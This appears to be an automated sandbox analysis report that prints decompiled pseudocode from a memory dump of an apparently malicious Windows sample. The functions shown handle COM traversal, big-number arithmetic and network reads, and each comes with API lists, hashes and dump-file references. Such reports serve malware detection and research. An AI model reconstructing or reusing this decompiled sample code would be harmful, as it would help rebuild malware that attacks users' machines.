                                                                                                                                                                                              					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                                                                                                                              					_t56 = _v8;
                                                                                                                                                                                              					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                                                                                                                              					if(_t118 >= 0) {
                                                                                                                                                                                              						__imp__#2(0xdfc298);
                                                                                                                                                                                              						_v28 = _t57;
                                                                                                                                                                                              						if(_t57 == 0) {
                                                                                                                                                                                              							_t118 = 0x8007000e;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t60 = _v32;
                                                                                                                                                                                              							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                                                                                                                              							_t87 = __imp__#6;
                                                                                                                                                                                              							_t118 = _t61;
                                                                                                                                                                                              							if(_t118 >= 0) {
                                                                                                                                                                                              								_t63 = _v24;
                                                                                                                                                                                              								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                                                                                                                              								if(_t118 >= 0) {
                                                                                                                                                                                              									_t130 = _v20;
                                                                                                                                                                                              									if(_t130 != 0) {
                                                                                                                                                                                              										_t67 = 3;
                                                                                                                                                                                              										_v64 = _t67;
                                                                                                                                                                                              										_v48 = _t67;
                                                                                                                                                                                              										_v56 = 0;
                                                                                                                                                                                              										_v40 = 0;
                                                                                                                                                                                              										if(_t130 > 0) {
                                                                                                                                                                                              											while(1) {
                                                                                                                                                                                              												_t68 = _v24;
                                                                                                                                                                                              												asm("movsd");
                                                                                                                                                                                              												asm("movsd");
                                                                                                                                                                                              												asm("movsd");
                                                                                                                                                                                              												asm("movsd");
                                                                                                                                                                                              												_t123 = _t123;
                                                                                                                                                                                              												asm("movsd");
                                                                                                                                                                                              												asm("movsd");
                                                                                                                                                                                              												asm("movsd");
                                                                                                                                                                                              												asm("movsd");
                                                                                                                                                                                              												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                                                                                                                                                              												if(_t118 < 0) {
                                                                                                                                                                                              													goto L16;
                                                                                                                                                                                              												}
                                                                                                                                                                                              												_t70 = _v8;
                                                                                                                                                                                              												_t109 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              												_t28 = _t109 + 0xdfe0bc; // 0x3050f1ff
                                                                                                                                                                                              												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                                                                                                                                                              												if(_t118 >= 0) {
                                                                                                                                                                                              													_t75 = _v16;
                                                                                                                                                                                              													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                                                                                                                                                              													if(_t118 >= 0 && _v12 != 0) {
                                                                                                                                                                                              														_t79 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              														_t33 = _t79 + 0xdfe078; // 0x76006f
                                                                                                                                                                                              														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                                                                                                                              															_t83 = _v16;
                                                                                                                                                                                              															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                                                                                                                                                              														}
                                                                                                                                                                                              														 *_t87(_v12);
                                                                                                                                                                                              													}
                                                                                                                                                                                              													_t77 = _v16;
                                                                                                                                                                                              													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                                                                                                                                                              												}
                                                                                                                                                                                              												_t72 = _v8;
                                                                                                                                                                                              												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                                                                                                              												_v40 = _v40 + 1;
                                                                                                                                                                                              												if(_v40 < _v20) {
                                                                                                                                                                                              													continue;
                                                                                                                                                                                              												}
                                                                                                                                                                                              												goto L16;
                                                                                                                                                                                              											}
                                                                                                                                                                                              										}
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              								L16:
                                                                                                                                                                                              								_t65 = _v24;
                                                                                                                                                                                              								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							 *_t87(_v28);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t58 = _v32;
                                                                                                                                                                                              						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t118;
                                                                                                                                                                                              			}





































                                                                                                                                                                                              0x00df91ba
                                                                                                                                                                                              0x00df91c3
                                                                                                                                                                                              0x00df91c4
                                                                                                                                                                                              0x00df91c8
                                                                                                                                                                                              0x00df91ce
                                                                                                                                                                                              0x00df91d4
                                                                                                                                                                                              0x00df91dd
                                                                                                                                                                                              0x00df91e3
                                                                                                                                                                                              0x00df91ed
                                                                                                                                                                                              0x00df91ef
                                                                                                                                                                                              0x00df91f5
                                                                                                                                                                                              0x00df91fa
                                                                                                                                                                                              0x00df9205
                                                                                                                                                                                              0x00df920b
                                                                                                                                                                                              0x00df9210
                                                                                                                                                                                              0x00df9332
                                                                                                                                                                                              0x00df9216
                                                                                                                                                                                              0x00df9216
                                                                                                                                                                                              0x00df9223
                                                                                                                                                                                              0x00df9229
                                                                                                                                                                                              0x00df922f
                                                                                                                                                                                              0x00df9233
                                                                                                                                                                                              0x00df9239
                                                                                                                                                                                              0x00df9246
                                                                                                                                                                                              0x00df924a
                                                                                                                                                                                              0x00df9250
                                                                                                                                                                                              0x00df9253
                                                                                                                                                                                              0x00df925b
                                                                                                                                                                                              0x00df925c
                                                                                                                                                                                              0x00df9260
                                                                                                                                                                                              0x00df9264
                                                                                                                                                                                              0x00df9267
                                                                                                                                                                                              0x00df926a
                                                                                                                                                                                              0x00df9270
                                                                                                                                                                                              0x00df9279
                                                                                                                                                                                              0x00df927f
                                                                                                                                                                                              0x00df9280
                                                                                                                                                                                              0x00df9283
                                                                                                                                                                                              0x00df9284
                                                                                                                                                                                              0x00df9285
                                                                                                                                                                                              0x00df928d
                                                                                                                                                                                              0x00df928e
                                                                                                                                                                                              0x00df928f
                                                                                                                                                                                              0x00df9291
                                                                                                                                                                                              0x00df9295
                                                                                                                                                                                              0x00df9299
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df929f
                                                                                                                                                                                              0x00df92a8
                                                                                                                                                                                              0x00df92ae
                                                                                                                                                                                              0x00df92b8
                                                                                                                                                                                              0x00df92bc
                                                                                                                                                                                              0x00df92be
                                                                                                                                                                                              0x00df92cb
                                                                                                                                                                                              0x00df92cf
                                                                                                                                                                                              0x00df92d7
                                                                                                                                                                                              0x00df92dc
                                                                                                                                                                                              0x00df92ee
                                                                                                                                                                                              0x00df92f0
                                                                                                                                                                                              0x00df92f6
                                                                                                                                                                                              0x00df92f6
                                                                                                                                                                                              0x00df92ff
                                                                                                                                                                                              0x00df92ff
                                                                                                                                                                                              0x00df9301
                                                                                                                                                                                              0x00df9307
                                                                                                                                                                                              0x00df9307
                                                                                                                                                                                              0x00df930a
                                                                                                                                                                                              0x00df9310
                                                                                                                                                                                              0x00df9313
                                                                                                                                                                                              0x00df931c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df931c
                                                                                                                                                                                              0x00df9270
                                                                                                                                                                                              0x00df926a
                                                                                                                                                                                              0x00df9253
                                                                                                                                                                                              0x00df9322
                                                                                                                                                                                              0x00df9322
                                                                                                                                                                                              0x00df9328
                                                                                                                                                                                              0x00df9328
                                                                                                                                                                                              0x00df932e
                                                                                                                                                                                              0x00df932e
                                                                                                                                                                                              0x00df9337
                                                                                                                                                                                              0x00df933d
                                                                                                                                                                                              0x00df933d
                                                                                                                                                                                              0x00df91fa
                                                                                                                                                                                              0x00df9346

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00DFC298), ref: 00DF9205
                                                                                                                                                                                              • lstrcmpW.KERNEL32(00000000,0076006F), ref: 00DF92E6
                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00DF92FF
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00DF932E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$Free$Alloclstrcmp
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1885612795-0
                                                                                                                                                                                              • Opcode ID: 9a500cea34665af39781ab8278785313024ff980b6f166a3b6e341d979d31a17
                                                                                                                                                                                              • Instruction ID: 36431f82757a018f8703b5dafc85f69b3458a99882d742b853e17c7fbb954ecd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a500cea34665af39781ab8278785313024ff980b6f166a3b6e341d979d31a17
                                                                                                                                                                                              • Instruction Fuzzy Hash: ED512C75D00519EFCB00DFA8C8989AEF7BAEF89704B158594E915EB360D731AD42CBB0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E00DF7664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				void _v92;
                                                                                                                                                                                              				void _v236;
                                                                                                                                                                                              				void* _t55;
                                                                                                                                                                                              				unsigned int _t56;
                                                                                                                                                                                              				signed int _t66;
                                                                                                                                                                                              				signed int _t74;
                                                                                                                                                                                              				void* _t76;
                                                                                                                                                                                              				signed int _t79;
                                                                                                                                                                                              				void* _t81;
                                                                                                                                                                                              				void* _t92;
                                                                                                                                                                                              				void* _t96;
                                                                                                                                                                                              				signed int* _t99;
                                                                                                                                                                                              				signed int _t101;
                                                                                                                                                                                              				signed int _t103;
                                                                                                                                                                                              				void* _t107;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t92 = _a12;
                                                                                                                                                                                              				_t101 = __eax;
                                                                                                                                                                                              				_t55 = E00DF48F0(_a16, _t92);
                                                                                                                                                                                              				_t79 = _t55;
                                                                                                                                                                                              				if(_t79 == 0) {
                                                                                                                                                                                              					L18:
                                                                                                                                                                                              					return _t55;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                                                                                                              				_t81 = 0;
                                                                                                                                                                                              				_t96 = 0x20;
                                                                                                                                                                                              				if(_t56 == 0) {
                                                                                                                                                                                              					L4:
                                                                                                                                                                                              					_t97 = _t96 - _t81;
                                                                                                                                                                                              					_v12 = _t96 - _t81;
                                                                                                                                                                                              					E00DF748A(_t79,  &_v236);
                                                                                                                                                                                              					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00DF7074(_t101,  &_v236, _a8, _t96 - _t81);
                                                                                                                                                                                              					E00DF7074(_t79,  &_v92, _a12, _t97);
                                                                                                                                                                                              					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                                                                                                                                                                              					_t66 = E00DF748A(_t101, 0xdfd1b0);
                                                                                                                                                                                              					_t103 = _t101 - _t79;
                                                                                                                                                                                              					_a8 = _t103;
                                                                                                                                                                                              					if(_t103 < 0) {
                                                                                                                                                                                              						L17:
                                                                                                                                                                                              						E00DF748A(_a16, _a4);
                                                                                                                                                                                              						E00DF2FED(_t79,  &_v236, _a4, _t97);
                                                                                                                                                                                              						memset( &_v236, 0, 0x8c);
                                                                                                                                                                                              						_t55 = memset( &_v92, 0, 0x44);
                                                                                                                                                                                              						goto L18;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						if(_v8 != 0xffffffff) {
                                                                                                                                                                                              							_push(1);
                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                              							_push( *_t99);
                                                                                                                                                                                              							L00DFB088();
                                                                                                                                                                                              							_t74 = _t66 +  *(_t99 - 4);
                                                                                                                                                                                              							asm("adc edx, esi");
                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                              							_push(_v8 + 1);
                                                                                                                                                                                              							_push(_t92);
                                                                                                                                                                                              							_push(_t74);
                                                                                                                                                                                              							L00DFB082();
                                                                                                                                                                                              							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                                                                                                              								_t74 = _t74 | 0xffffffff;
                                                                                                                                                                                              								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t74 =  *_t99;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                                                                                                                                                              						_a12 = _t74;
                                                                                                                                                                                              						_t76 = E00DF6FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                              							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                              							if( *_t99 != 0) {
                                                                                                                                                                                              								goto L14;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							L13:
                                                                                                                                                                                              							_t92 =  &_v92;
                                                                                                                                                                                              							if(E00DF15CE(_t79, _t92, _t106) < 0) {
                                                                                                                                                                                              								break;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							L14:
                                                                                                                                                                                              							_a12 = _a12 + 1;
                                                                                                                                                                                              							_t76 = E00DF687D(_t79,  &_v92, _t106, _t106);
                                                                                                                                                                                              							 *_t99 =  *_t99 - _t76;
                                                                                                                                                                                              							if( *_t99 != 0) {
                                                                                                                                                                                              								goto L14;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_a8 = _a8 - 1;
                                                                                                                                                                                              						_t66 = _a12;
                                                                                                                                                                                              						_t99 = _t99 - 4;
                                                                                                                                                                                              						 *(0xdfd1b0 + _a8 * 4) = _t66;
                                                                                                                                                                                              					} while (_a8 >= 0);
                                                                                                                                                                                              					_t97 = _v12;
                                                                                                                                                                                              					goto L17;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				while(_t81 < _t96) {
                                                                                                                                                                                              					_t81 = _t81 + 1;
                                                                                                                                                                                              					_t56 = _t56 >> 1;
                                                                                                                                                                                              					if(_t56 != 0) {
                                                                                                                                                                                              						continue;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L4;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				goto L4;
                                                                                                                                                                                              			}





















                                                                                                                                                                                              0x00df7667
                                                                                                                                                                                              0x00df7673
                                                                                                                                                                                              0x00df7679
                                                                                                                                                                                              0x00df767e
                                                                                                                                                                                              0x00df7682
                                                                                                                                                                                              0x00df77df
                                                                                                                                                                                              0x00df77e3
                                                                                                                                                                                              0x00df77e3
                                                                                                                                                                                              0x00df7688
                                                                                                                                                                                              0x00df768c
                                                                                                                                                                                              0x00df7690
                                                                                                                                                                                              0x00df7693
                                                                                                                                                                                              0x00df769e
                                                                                                                                                                                              0x00df76a4
                                                                                                                                                                                              0x00df76a9
                                                                                                                                                                                              0x00df76ac
                                                                                                                                                                                              0x00df76c6
                                                                                                                                                                                              0x00df76d2
                                                                                                                                                                                              0x00df76db
                                                                                                                                                                                              0x00df76e5
                                                                                                                                                                                              0x00df76ea
                                                                                                                                                                                              0x00df76ec
                                                                                                                                                                                              0x00df76ef
                                                                                                                                                                                              0x00df779d
                                                                                                                                                                                              0x00df77a3
                                                                                                                                                                                              0x00df77b4
                                                                                                                                                                                              0x00df77c7
                                                                                                                                                                                              0x00df77d7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df77dc
                                                                                                                                                                                              0x00df76f8
                                                                                                                                                                                              0x00df76ff
                                                                                                                                                                                              0x00df7703
                                                                                                                                                                                              0x00df7709
                                                                                                                                                                                              0x00df770b
                                                                                                                                                                                              0x00df770d
                                                                                                                                                                                              0x00df770f
                                                                                                                                                                                              0x00df7711
                                                                                                                                                                                              0x00df771b
                                                                                                                                                                                              0x00df7720
                                                                                                                                                                                              0x00df7722
                                                                                                                                                                                              0x00df7724
                                                                                                                                                                                              0x00df7725
                                                                                                                                                                                              0x00df7726
                                                                                                                                                                                              0x00df7727
                                                                                                                                                                                              0x00df772e
                                                                                                                                                                                              0x00df7735
                                                                                                                                                                                              0x00df7738
                                                                                                                                                                                              0x00df7738
                                                                                                                                                                                              0x00df7705
                                                                                                                                                                                              0x00df7705
                                                                                                                                                                                              0x00df7705
                                                                                                                                                                                              0x00df7740
                                                                                                                                                                                              0x00df7748
                                                                                                                                                                                              0x00df7751
                                                                                                                                                                                              0x00df7756
                                                                                                                                                                                              0x00df7756
                                                                                                                                                                                              0x00df775b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df775d
                                                                                                                                                                                              0x00df7760
                                                                                                                                                                                              0x00df776a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df776c
                                                                                                                                                                                              0x00df776c
                                                                                                                                                                                              0x00df7776
                                                                                                                                                                                              0x00df7756
                                                                                                                                                                                              0x00df775b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df775b
                                                                                                                                                                                              0x00df7780
                                                                                                                                                                                              0x00df7783
                                                                                                                                                                                              0x00df7786
                                                                                                                                                                                              0x00df778d
                                                                                                                                                                                              0x00df778d
                                                                                                                                                                                              0x00df779a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df779a
                                                                                                                                                                                              0x00df7695
                                                                                                                                                                                              0x00df7699
                                                                                                                                                                                              0x00df769a
                                                                                                                                                                                              0x00df769c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df769c
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00DF7711
                                                                                                                                                                                              • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00DF7727
                                                                                                                                                                                              • memset.NTDLL ref: 00DF77C7
                                                                                                                                                                                              • memset.NTDLL ref: 00DF77D7
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: memset$_allmul_aulldiv
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3041852380-0
                                                                                                                                                                                              • Opcode ID: 657243d7c41fc9852e116b31b967ffdd2c932abc91f2737c5dca5e7e88b68ed3
                                                                                                                                                                                              • Instruction ID: 013d75f9db2fe8051e8346bfcd71768397b7d7089f6c436060992cd52e71c222
                                                                                                                                                                                              • Opcode Fuzzy Hash: 657243d7c41fc9852e116b31b967ffdd2c932abc91f2737c5dca5e7e88b68ed3
                                                                                                                                                                                              • Instruction Fuzzy Hash: E3417231A0425DABDB10AFA8DC41BFE7775EF44310F11C529FA16A7181EB709E558B70
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 00DFA97E
                                                                                                                                                                                                • Part of subcall function 00DF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,00DF1C51), ref: 00DF58CA
                                                                                                                                                                                              • ResetEvent.KERNEL32(?), ref: 00DFA9F2
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00DFAA15
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00DFAAC0
                                                                                                                                                                                                • Part of subcall function 00DF147E: HeapFree.KERNEL32(00000000,00000000,00DF1D11,00000000,?,?,-00000008), ref: 00DF148A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 943265810-0
                                                                                                                                                                                              • Opcode ID: 94a62353622c6e00fe0229df8c0eae9c97655e34e30d5f97615a9b5c31afe2e2
                                                                                                                                                                                              • Instruction ID: b1ffc4d74bbb0acc3466e980addccb8c2bad137f2540819862f3a6276c19a328
                                                                                                                                                                                              • Opcode Fuzzy Hash: 94a62353622c6e00fe0229df8c0eae9c97655e34e30d5f97615a9b5c31afe2e2
                                                                                                                                                                                              • Instruction Fuzzy Hash: FD41A1B1500708BFD7319FA5CD48E7B7BBEEB85700B198929F646D21A0D771DA58CA30
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 39%
                                                                                                                                                                                              			E00DF8F08(void* __eax) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				intOrPtr _t36;
                                                                                                                                                                                              				intOrPtr* _t37;
                                                                                                                                                                                              				intOrPtr* _t39;
                                                                                                                                                                                              				void* _t53;
                                                                                                                                                                                              				long _t58;
                                                                                                                                                                                              				void* _t59;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t59 = __eax;
                                                                                                                                                                                              				_t58 = 0;
                                                                                                                                                                                              				ResetEvent( *(__eax + 0x1c));
                                                                                                                                                                                              				_push( &_v8);
                                                                                                                                                                                              				_push(4);
                                                                                                                                                                                              				_push( &_v20);
                                                                                                                                                                                              				_push( *((intOrPtr*)(_t59 + 0x18)));
                                                                                                                                                                                              				if( *0xdfd138() != 0) {
                                                                                                                                                                                              					L5:
                                                                                                                                                                                              					if(_v8 == 0) {
                                                                                                                                                                                              						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                                                                                                                                                                              						L21:
                                                                                                                                                                                              						return _t58;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					 *0xdfd168(0, 1,  &_v12);
                                                                                                                                                                                              					if(0 != 0) {
                                                                                                                                                                                              						_t58 = 8;
                                                                                                                                                                                              						goto L21;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t36 = E00DF58BE(0x1000);
                                                                                                                                                                                              					_v16 = _t36;
                                                                                                                                                                                              					if(_t36 == 0) {
                                                                                                                                                                                              						_t58 = 8;
                                                                                                                                                                                              						L18:
                                                                                                                                                                                              						_t37 = _v12;
                                                                                                                                                                                              						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                                                                                                                                                                              						goto L21;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(_v8);
                                                                                                                                                                                              					_push( &_v20);
                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                              						_t39 = _v12;
                                                                                                                                                                                              						_t56 =  *_t39;
                                                                                                                                                                                              						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                                                                                                                                                                              						ResetEvent( *(_t59 + 0x1c));
                                                                                                                                                                                              						_push( &_v8);
                                                                                                                                                                                              						_push(0x1000);
                                                                                                                                                                                              						_push(_v16);
                                                                                                                                                                                              						_push( *((intOrPtr*)(_t59 + 0x18)));
                                                                                                                                                                                              						if( *0xdfd138() != 0) {
                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t58 = GetLastError();
                                                                                                                                                                                              						if(_t58 != 0x3e5) {
                                                                                                                                                                                              							L15:
                                                                                                                                                                                              							E00DF147E(_v16);
                                                                                                                                                                                              							if(_t58 == 0) {
                                                                                                                                                                                              								_t58 = E00DF16DB(_v12, _t59);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							goto L18;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t58 = E00DF9D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
                                                                                                                                                                                              						if(_t58 != 0) {
                                                                                                                                                                                              							goto L15;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                                                                                                                                                              						if(_t58 != 0) {
                                                                                                                                                                                              							goto L15;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						L13:
                                                                                                                                                                                              						_t58 = 0;
                                                                                                                                                                                              						if(_v8 == 0) {
                                                                                                                                                                                              							goto L15;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                              						_push(_v8);
                                                                                                                                                                                              						_push(_v16);
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t58 = GetLastError();
                                                                                                                                                                                              				if(_t58 != 0x3e5) {
                                                                                                                                                                                              					L4:
                                                                                                                                                                                              					if(_t58 != 0) {
                                                                                                                                                                                              						goto L21;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L5;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t58 = E00DF9D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
                                                                                                                                                                                              				if(_t58 != 0) {
                                                                                                                                                                                              					goto L21;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                                                                                                                                                              				goto L4;
                                                                                                                                                                                              			}














                                                                                                                                                                                              0x00df8f17
                                                                                                                                                                                              0x00df8f1c
                                                                                                                                                                                              0x00df8f1e
                                                                                                                                                                                              0x00df8f23
                                                                                                                                                                                              0x00df8f24
                                                                                                                                                                                              0x00df8f29
                                                                                                                                                                                              0x00df8f2a
                                                                                                                                                                                              0x00df8f35
                                                                                                                                                                                              0x00df8f66
                                                                                                                                                                                              0x00df8f6b
                                                                                                                                                                                              0x00df902e
                                                                                                                                                                                              0x00df9031
                                                                                                                                                                                              0x00df9037
                                                                                                                                                                                              0x00df9037
                                                                                                                                                                                              0x00df8f78
                                                                                                                                                                                              0x00df8f80
                                                                                                                                                                                              0x00df902b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df902b
                                                                                                                                                                                              0x00df8f8b
                                                                                                                                                                                              0x00df8f90
                                                                                                                                                                                              0x00df8f95
                                                                                                                                                                                              0x00df901d
                                                                                                                                                                                              0x00df901e
                                                                                                                                                                                              0x00df901e
                                                                                                                                                                                              0x00df9024
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9024
                                                                                                                                                                                              0x00df8f9b
                                                                                                                                                                                              0x00df8f9d
                                                                                                                                                                                              0x00df8fa3
                                                                                                                                                                                              0x00df8fa4
                                                                                                                                                                                              0x00df8fa4
                                                                                                                                                                                              0x00df8fa7
                                                                                                                                                                                              0x00df8faa
                                                                                                                                                                                              0x00df8fb0
                                                                                                                                                                                              0x00df8fb5
                                                                                                                                                                                              0x00df8fb6
                                                                                                                                                                                              0x00df8fbb
                                                                                                                                                                                              0x00df8fbe
                                                                                                                                                                                              0x00df8fc9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df8fd1
                                                                                                                                                                                              0x00df8fd9
                                                                                                                                                                                              0x00df9002
                                                                                                                                                                                              0x00df9005
                                                                                                                                                                                              0x00df900c
                                                                                                                                                                                              0x00df9017
                                                                                                                                                                                              0x00df9017
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df900c
                                                                                                                                                                                              0x00df8fe5
                                                                                                                                                                                              0x00df8fe9
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df8feb
                                                                                                                                                                                              0x00df8ff0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df8ff2
                                                                                                                                                                                              0x00df8ff2
                                                                                                                                                                                              0x00df8ff7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df8ff9
                                                                                                                                                                                              0x00df8ffa
                                                                                                                                                                                              0x00df8ffd
